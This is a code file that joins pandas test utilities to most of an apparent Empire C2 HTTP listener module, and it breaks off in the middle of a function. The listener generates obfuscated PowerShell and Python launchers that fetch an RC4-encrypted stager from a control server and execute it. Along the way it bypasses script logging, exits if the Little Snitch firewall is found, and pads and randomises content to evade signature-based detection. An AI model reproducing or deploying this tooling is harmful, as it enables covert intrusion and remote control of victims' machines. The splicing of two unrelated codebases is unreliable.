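# Usage sketch (illustrative): since the decorator discards return values,
# results are collected through a shared list instead.
def _example_test_parallel():
    results = []

    @test_parallel(num_threads=4)
    def append_one():
        results.append(1)

    append_one()
    assert len(results) == 4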
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
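# Illustrative sketch (added for clarity): wrapping np.sum so NaNs are
# dropped via Series.dropna before the reduction runs.
def _example_skipna_wrapper():
    s = Series([1.0, np.nan, 2.0])
    wrapped = _make_skipna_wrapper(np.sum)
    return wrapped(s)  # 3.0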
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three-item tuples (ndframe, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
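# Usage sketch (illustrative): plain names map straight onto the operator
# module, while reverse ("r"-prefixed) names swap the operands.
def _example_get_op_from_name():
    add = get_op_from_name("__add__")
    rsub = get_op_from_name("__rsub__")
    assert add(2, 3) == 5
    assert rsub(2, 3) == 1  # evaluated as 3 - 2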
http.py
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import string
import sys
import time
from builtins import object
from builtins import str
from typing import List
from flask import Flask, request, make_response, send_from_directory
from pydispatch import dispatcher
from werkzeug.serving import WSGIRequestHandler
from empire.server.common import encryption
from empire.server.common import helpers
from empire.server.common import packets
from empire.server.common import templating
from empire.server.utils import data_util
from empire.server.database.base import Session
from empire.server.database import models
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0',
'SuggestedValues': ['0.0.0.0'],
'Strict': False
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': '',
'SuggestedValues': ['1335', '1336']
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'Cookie': {
'Description': 'Custom Cookie Name',
'Required': False,
'Value': ''
},
'StagerURI': {
'Description': 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required': False,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'SlackURL': {
'Description': 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required': False,
'Value': ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(data_util.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature-based scans
self.header_offset = random.randint(0, 64)
self.session_cookie = ''
# if the current session cookie is empty, generate a random cookie
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, bypasses: List[str] = None):
"""
Generate a basic launcher for the specified listener.
"""
bypasses = [] if bypasses is None else bypasses
if not language:
print(helpers.color('[!] listeners/http generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
cookie = listenerOptions['Cookie']['Value']
# generate a new cookie if the current session cookie is empty, so multiple listeners don't end up sharing an empty cookie
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
for bypass in bypasses:
stager += bypass
if safeChecks.lower() == 'true':
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='" + userAgent + "';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "');"
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $" + helpers.generate_random_script_var_name("wc") + ".Proxy;"
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization(
"try{$ig=$" + helpers.generate_random_script_var_name(
"wc") + ".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket.decode('UTF-8'))
stager += helpers.randomize_capitalization(
"$data=$" + helpers.generate_random_script_var_name("wc") + ".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out.decode('UTF-8')):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib.request;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8')
launcherBase += "req=urllib.request.Request(server+t);\n"
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.request.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib.request.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode('UTF-8')
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python3 &" % (
launchEncoded)
return launcher
else:
return launcherBase
#very basic csharp implementation
if language.startswith("csh"):
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
customHeaders = profile.split('|')[2:]
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
with open(self.mainMenu.installPath + "/stagers/Sharpire.yaml", "rb") as f:
stager_yaml = f.read()
stager_yaml = stager_yaml.decode("UTF-8")
stager_yaml = stager_yaml \
.replace("{{ REPLACE_ADDRESS }}", host) \
.replace("{{ REPLACE_SESSIONKEY }}", stagingKey) \
.replace("{{ REPLACE_PROFILE }}", profile) \
.replace("{{ REPLACE_WORKINGHOURS }}", workingHours) \
.replace("{{ REPLACE_KILLDATE }}", killDate) \
.replace("{{ REPLACE_DELAY }}", str(delay)) \
.replace("{{ REPLACE_JITTER }}", str(jitter)) \
.replace("{{ REPLACE_LOSTLIMIT }}", str(lostLimit))
compiler = self.mainMenu.loadedPlugins.get("csharpserver")
if not compiler.status == 'ON':
print(helpers.color('[!] csharpserver plugin not running'))
else:
file_name = compiler.do_send_stager(stager_yaml, "Sharpire")
return file_name
else:
print(helpers.color(
"[!] listeners/http generate_launcher(): invalid language specification: only 'powershell', 'python', and 'csharp' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
with open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath)) as f:
stager = f.read()
# Get the random function name generated at install and patch the stager with the proper function name
stager = data_util.keyword_obfuscation(stager)
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
# headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
#stager = stager.encode('UTF-8')
#randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
# There doesn't seem to be any condition in which the encrypt flag isn't
# set, so the other if/else branches are effectively unreachable
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
# otherwise return the standard stager
return stager
else:
print(helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand="", version=''):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
with open(self.mainMenu.installPath + "/data/agent/agent.ps1") as f:
code = f.read()
# Get the random function name generated at install and patch the stager with the proper function name
code = data_util.keyword_obfuscation(code)
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
if version == 'ironpython':
f = open(self.mainMenu.installPath + "/data/agent/ironpython_agent.py")
else:
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode("UTF-8")))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))
return code
elif language == "csharp":
# currently the agent is stageless, so do nothing
code = ""
return code
else:
print(helpers.color(
"[!] listeners/http generate_agent(): invalid language specification, only 'powershell', 'python', & 'csharp' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
